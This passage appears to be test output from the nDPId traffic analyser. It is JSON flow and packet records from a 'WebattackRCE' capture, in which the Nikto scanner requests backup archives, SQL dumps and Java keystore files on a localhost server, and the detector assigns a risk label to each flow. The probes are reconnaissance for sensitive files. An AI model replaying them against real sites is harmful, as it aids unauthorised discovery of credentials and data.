{"hostname":"127.0.0.1","url":"127.0.0.1\/1270.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":396,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277301,"flow_last_seen":1576420277301,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277301,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50336,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_packet_id":1,"flow_last_seen":1576420277301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277301,"pkt":"AAAAAAAAAAAAAAAACABFAADAvp1AAEAGfZh\/AAABfwAAAcSgH5BBBoY3\/wT40oAYAED+tAAAAQEICp1m\/V2dZv1dR0VUIC8xMjcwLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":396,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277301,"flow_last_seen":1576420277301,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277301,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50336,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":397,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277302,"flow_last_seen":1576420277302,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277302,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50338,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_packet_id":1,"flow_last_seen":1576420277302,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277302,"pkt":"AAAAAAAAAAAAAAAACABFAADG+c1AAEAGQmJ\/AAABfwAAAcSiH5Dkc8Fn99puBYAYAED+ugAAAQEICp1m\/V6dZv1eR0VUIC8xMjcwMDEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":397,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277302,"flow_last_seen":1576420277302,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277302,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50338,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277304,"flow_last_seen":1576420277304,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277304,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50340,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_packet_id":1,"flow_last_seen":1576420277304,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277304,"pkt":"AAAAAAAAAAAAAAAACABFAADGn2FAAEAGnM5\/AAABfwAAAcSkH5ABoKfybJgPqoAYAED+ugAAAQEICp1m\/WCdZv1gR0VUIC8xMjcwMDEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277304,"flow_last_seen":1576420277304,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277304,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50340,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277306,"flow_last_seen":1576420277306,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277306,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50342,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_packet_id":1,"flow_last_seen":1576420277306,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277306,"pkt":"AAAAAAAAAAAAAAAACABFAADBq8lAAEAGkGt\/AAABfwAAAcSmH5B085NqCLeHfoAYAED+tQAAAQEICp1m\/WGdZv1hR0VUIC8xMjcwMC5qa3MgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":399,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277306,"flow_last_seen":1576420277306,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277306,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50342,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":400,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277307,"flow_last_seen":1576420277307,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277307,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50344,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_packet_id":1,"flow_last_seen":1576420277307,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277307,"pkt":"AAAAAAAAAAAAAAAACABFAADBE+BAAEAGKFV\/AAABfwAAAcSoH5A\/FCtx8eapa4AYAED+tQAAAQEICp1m\/WOdZv1jR0VUIC8xMjcwMC5qa3MgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":400,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277307,"flow_last_seen":1576420277307,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277307,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50344,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":401,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277308,"flow_last_seen":1576420277308,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277308,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50346,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_packet_id":1,"flow_last_seen":1576420277308,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277308,"pkt":"AAAAAAAAAAAAAAAACABFAADBd5tAAEAGxJl\/AAABfwAAAcSqH5Asxk83LE5RU4AYAED+tQAAAQEICp1m\/WSdZv1kR0VUIC8xMjcwMC5lZ2cgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":401,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277308,"flow_last_seen":1576420277308,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277308,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50346,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":402,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277309,"flow_last_seen":1576420277309,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277309,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50348,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":402,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_packet_id":1,"flow_last_seen":1576420277309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277309,"pkt":"AAAAAAAAAAAAAAAACABFAADB9HRAAEAGR8B\/AAABfwAAAcSsH5BlTMzeEpcpJ4AYAED+tQAAAQEICp1m\/WWdZv1lR0VUIC8xMjcwMC5lZ2cgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":402,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277309,"flow_last_seen":1576420277309,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277309,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50348,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":403,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277310,"flow_last_seen":1576420277310,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277310,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50350,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_packet_id":1,"flow_last_seen":1576420277310,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277310,"pkt":"AAAAAAAAAAAAAAAACABFAADFcQdAAEAGyyl\/AAABfwAAAcSuH5C\/jUmrZ8IhxYAYAED+uQAAAQEICp1m\/WadZv1mR0VUIC8xMjdfMF8wXzEudGFyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":403,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277310,"flow_last_seen":1576420277310,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277310,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50350,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":404,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277311,"flow_last_seen":1576420277311,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277311,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50352,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_packet_id":1,"flow_last_seen":1576420277311,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277311,"pkt":"AAAAAAAAAAAAAAAACABFAADFdZ1AAEAGxpN\/AAABfwAAAcSwH5BGIE0sZXhTqYAYAED+uQAAAQEICp1m\/WedZv1nR0VUIC8xMjdfMF8wXzEudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277311,"flow_last_seen":1576420277311,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277311,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50352,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":405,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277313,"flow_last_seen":1576420277313,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277313,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50354,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":405,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_packet_id":1,"flow_last_seen":1576420277313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277313,"pkt":"AAAAAAAAAAAAAAAACABFAADESF9AAEAG89J\/AAABfwAAAcSyH5CXAnDudCS+HoAYAED+uAAAAQEICp1m\/WmdZv1oR0VUIC8xMjcwMC50YXIuZ3ogSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277313,"flow_last_seen":1576420277313,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277313,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50354,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277314,"flow_last_seen":1576420277314,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277314,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50356,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_packet_id":1,"flow_last_seen":1576420277314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277314,"pkt":"AAAAAAAAAAAAAAAACABFAADEBf5AAEAGNjR\/AAABfwAAAcS0H5ApMj1NA0MOSIAYAED+uAAAAQEICp1m\/WqdZv1qR0VUIC8xMjcwMC50YXIuZ3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277314,"flow_last_seen":1576420277314,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277314,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50356,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 